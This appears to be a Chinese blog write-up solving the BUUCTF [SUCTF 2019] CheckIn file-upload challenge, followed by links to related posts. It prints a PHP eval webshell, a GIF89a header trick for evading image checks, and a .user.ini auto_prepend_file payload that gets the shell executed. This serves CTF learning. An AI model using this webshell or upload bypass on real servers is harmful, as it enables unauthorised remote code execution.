buuctf系列解题思路祥讲--[SUCTF 2019]CheckIn1--文件上传以及user.ini的应用

最新推荐文章于 2026-06-23 16:05:49 发布
原创 最新推荐文章于 2026-06-23 16:05:49 发布 · 372 阅读 · 6 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
GEO检测
标签
#网络安全 #web安全 #php #nginx

涉及知识点都会在第二部分讲解

1、解题思路

这题是一个文件上传的靶场,我们先手动尝试上传文件,发现对php有检测,随后可以使用burp爆破后缀名

上传图片马发现他会检测文件内容是否有?(可以把php语句换位js形式的图片马)

上传js样式的图片马内容为如下:

<script language="pHp">@eval($_POST['CMD'])</script>

上传发现显示不是图片

所以我们在对其添加文件头进行上传发现成功了

随后我们上传htaccess发现会上传失败

那我们尝试一下.user.ini文件,内容如下

GIF89a                  
auto_prepend_file=shell.jpg

然后使用蚁剑连接:域名+upload/。。。/index.php,随后就可以进入和后台查看flag了

2、涉及知识点

1、//三种图片的前缀 JPG :FF D8 FF E0 00 10 4A 46 49 46(16进制编码) GIF:47 49 46 38 39 61(ascll值是GIF89a) PNG: 89 50 4E 47

2、user.ini和.htaccess一样是目录的配置文件。这里我们可以把.user.ini看作是用户自定义的一个php.ini,需要访问该目录下的任意php文件时才会触发

3、.user.ini比.htaccess用的更广,不管是nginx/apache/IIS,只要是以CGI/FastCGI模式运行的php都可以用这个方法。

4、/*这是.user.ini的两个配置 
auto_prepend_file是在文件前插入
auto_append_file是在文件最后才插入*/


 

Buuctf文件上传.uesr.ini绕过)[SUCTF 2019]CheckIn 1
m0_64444909的博客
05-21 2767
解题思路.打开题目:发现一个上传框,猜测上传一句话木马,获取后台shell 二.上传.php .phtml .等有关的PHP文件,都显示非法后缀 三.上传.htaccess文件
BUUCTF [SUCTF 2019]CheckIn 1user.ini文件构成的PHP后门 | 两种解法!)
m0_73734159的博客
11-28 2541
只需要重新开启题目环境即可,最后,做这道题的步骤是,先上传.user.ini配置文件,再去上传PHP一句话木马文件。因为我们使用的是auto_prepend_file,在主文件之前就已经自动解析文件名了,所以index.php主文件在最后面。php.ini大家都熟悉,那么我们就可以把.user.ini理解为用户可自定义的php.ini配置文件。绕过后缀的文件格式有phpphp3、php4、php5、phtml、pht。.user.ini配置文件和.htaccess配置文件都是为了解析PHP代码。
BUUCTF-[SUCTF 2019]CheckIn -[WP]
九尾ww的博客
12-20 504
用于判断一个给定文件的图像类型。它通过读取文件头部的特定信息来确定文件是否为图像以及具体是哪种常见的图像类型。在原来的代码前面加上图片文件头GIF89a,让exif_imagetype识别。是一个在 PHP 环境下使用的配置文件,主要用于用户自定义的配置。它可以对特定目录及其子目录下的 PHP 脚本的运行环境进行配置。exif_imagetype这个是php中的一个内置函数。网上找的思路、用到.user.ini文件。然后再上传图片tz.jpeg。有个index.php文件。不能上传php后缀文件。
BUUCTF WEB [SUCTF 2019]CheckIn
Y1da的博客
04-17 414
BUUCTF WEB [SUCTF 2019]CheckIn .user.ini文件 PHP 支持基于每个目录的 INI 文件配置。 除了主 php.ini 之外,PHP 还会在每个目录下扫描 INI 文件,从被执行的 PHP 文件所在目录开始一直上升到 web 根目录($_SERVER[‘DOCUMENT_ROOT’] 所指定的)。如果被执行的 PHP 文件在 web 根目录之外,则只扫描该目录。 与php.ini不同,.user.ini是一个能被动态加载的ini文件,它实际上是一个可以由用户自定义
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
热门推荐
weixin_59086772的博客
10-18 1万+
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全126天
m0_74741186的博客
06-23 32
今天主要做了就是用cert就是,将域名就是全部收集了一遍,然后就是发现有几个域名又是新资产,然后我就又去测试了,但是就是没测试多少的感觉,就是这样,然后明天就是我要就是测试10个站,然后就是什么,我就不信就是10个站就是一个漏洞都没有,然后就是测试了什么就是都要记忆起来,对,就是这样的,测试了四个域名,整合下来,一天就是测试了3个站的感觉,就是对我来说,好像就是一天标记了就是三个站,然后就是这么测试一天了,我去,这感觉累了。就是开发者就是同种资产,我昨天就是找资产就是看到了这种,然后直接就是。
天磊卫士:全维度网络安全检测服务,筑牢系统全生命周期风险防线
最新发布
2401_88433764的博客
06-23 222
天磊卫士深耕网络安全检测领域,搭建包含漏洞扫描、渗透测试、代码审计、APP 安全评估、双新评估在内的完整检测服务体系,覆盖系统上线前、常态化巡检、新技术落地全阶段,为政企、金融、医疗、教育、互联网等行业提供标准化、可落地的安全检测支撑,兼顾风险排查与合规达标双重需求。天磊卫士采用自动化工具搭配人工复核的模式,覆盖网络设备、服务器、Web 站点、数据库、云资产等全部线上资产,同步更新漏洞特征库,快速识别开放高危端口、弱口令、补丁缺失、SQL 注入、目录遍历等已知安全隐患。网络安全风险防控重在前置排查。
网络安全125天
m0_74741186的博客
06-22 41
那就是过waf的就是sql注入,其实就是需要本地的就是可以执行的,所以就是要在本地就是可以执行的,然后就是过waf的操作自己想,但是自己就是学了sql注入,但是自己就是还是不会,但是就是没有实际动手操作就是少了。就是没有复盘,每天不应该复盘为啥自己挖不到洞吗,就是没有思路,所以你自己就是盲目挖洞,就是以后前一天就是要写就是明天要干啥,但是这个月要过完了。然后就是想就是要想这个逻辑,然后就是一个网站就是看一眼就走了,每个方法都是要尝试,然后去做,累了,困了,睡觉了。然后就是学习新知识,复盘。
2026年6月第4周网络安全形势周报
Bruce_xiaowei的博客
06-20 1030
本周全球网络安全态势呈"AI资产定向收割 + 关基漏洞集中曝光 + 国内执法高压震慑AI资产成为新攻击靶标:诺和诺德遭FulcrumSec定向勒索,1.3TB数据(含"蜻蜓"AI模型全栈权重、临床数据)失窃,2500万美元赎金遭拒,标志AI研发资产首次成为制药行业的核心攻击目标。KEV目录新增2个高危在野利用漏洞。
瑞士网络安全法律与实践
网络研究观
06-17 234
瑞士是一个由26个联邦州(州)和一个联邦政府组成的联邦制国家。这导致了瑞士法律体系的层级化,以及有时分散的官方网络安全策略。瑞士的网络安全与数据保护领域密切相关。网络安全通常被视为数据安全的衍生领域,甚至是其同义词。顾名思义,数据安全旨在保障数据处理和存储活动的安全性和弹性。
墨西哥网络安全法律与实践
网络研究观
06-17 377
墨西哥没有专门的网络安全法,但多项法律条文间接地规范着这一领域,涉及多个监管机构。例如,有关于银行业、个人数据保护、犯罪行为和电信的法规。这些法律通过提供机构和企业必须遵守的框架来保护数字资产和个人信息,从而塑造了网络安全格局。
比利时网络安全趋势与发展
网络研究观
06-20 210
近年来,网络犯罪显著增加,勒索软件攻击数量不断增长,网络钓鱼活动日益复杂,重大数据泄露事件频发,私营企业和公共机构均深受其害。因此,网络安全已成为比利时公共和私营部门的一项关键战略考量。该领域的监管环境仍在建设中,某些法律法规已经生效,其他要求将在未来几年内实施,具体如下。
网络安全】hping3命令
sumengnan的博客
06-22 199
hping3 是一个非常强大的,常用于网络安全、渗透测试、链路诊断、防火墙测试等场景。1、可以发送自定义 ICMP/UDP/TCP 数据包,并显示目标回复。它处理分片和任意大小的数据包,并可用于在支持的协议下传输文件。2、测试防火墙规则,执行端口扫描,使用不同协议测试网络性能,进行路径 MTU 发现,执行不同协议下的跟踪路由操作,识别远程操作系统指纹,审计 TCP/IP 栈等。
网络安全等级保护(等保2.0)全面解析:从“被罚款“到“过测评“,这篇8000字把等保透了!(PPT)
专注数字化解决方案,每日更新精选报告。关注「无忧智库」,与你共探数智未来,日进一步。
06-22 389
第一句:对信息系统,分等级保护——系统越重要,防护要求越高;第二句:对信息安全产品,分等级管理——不同等级系统要用符合要求的安全产品;第三句:对信息安全事件,分等级响应处置——事件发生后,按等级启动不同强度的应对机制。核心精神:系统重要程度有多高,安全保护就应当有多强,既不能保护不足,也不能过度保护。这种"适度安全"的理念是等级保护最重要的思想精髓——一个小型乡镇管理系统,和一个全国联网的银行核心系统,绝不能套用同一套安全标准。信息系统本身:按等级分类、定级、建设、测评安全产品。
GitHub - mukul975/Anthropic-Cybersecurity-Skills: 817个结构化网络安全技能,适用于AI代理
06-23 408
⚠️— 本项目为独立社区创建,与 Anthropic PBC 无任何关联。
超自动化安全:应对网络安全人才短缺的解决方案
m0_74389308的博客
06-23 228
全球网络安全人才缺口达400万,中国企业面临人员短缺与能力失衡的双重挑战。安全团队日均处理百万级告警,实际处置率不足2%,且专家经验难以传承。超自动化安全通过三大路径破解困局:自动化处置将重复工作效率提升95%,经验数字化封装让知识沉淀为组织资产,低代码平台降低技术门槛。这种模式不仅释放人力专注核心任务,更将个体能力转化为团队战力,在人才稀缺背景下实现运营效能跃升。
第四章 hermes自动安装网络安全靶场
weixin_44626085的博客
06-22 33
【代码】第四章 hermes自动安装网络安全靶场。
传统云原生架构 VS AI 原生安全架构:生成式 AI 时代网络安全演进方向解读
NOVAnet2023的博客
06-23 357
生成式 AI、AI Agent 全面落地,企业流量结构与安全威胁发生根本性变化。本文结合行业权威数据与行业演观点,分析 GenAI 产业发展现状,对比传统云原生架构短板,解读下一代 AI 原生网络安全架构的发展逻辑。
网络安全】nping命令
sumengnan的博客
06-22 206
nping是 Nmap 工具套件中的一个独立网络探测工具,用来构造并发送自定义数据包。可以用于:测试网络连通性、测试防火墙规则、模拟 TCP/UDP/ICMP 流量、进行延迟/丢包分析、压力测试。
【架构实战】安全架构设计:让攻击者无从下手
分享技术应用、实践场景等,评论区开放技术难题讨论,共同成长进步。
06-18 323
安全架构的关键要点:纵深防御:不要依赖单一安全措施,多层防护默认安全安全应该是默认配置,不是可选功能最小权限:只授予必要的权限,不过度授权日志审计:所有操作都要有日志,方便溯源定期渗透测试:请专业团队定期做渗透测试安全培训:提高全员安全意识不要觉得"这只是内部接口"就不做安全。攻击者永远比你想象的更执着。你们系统有哪些接口可能存在安全漏洞?如果发现系统在遭受攻击,你能在几分钟内止血?个人观点,仅供参考。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值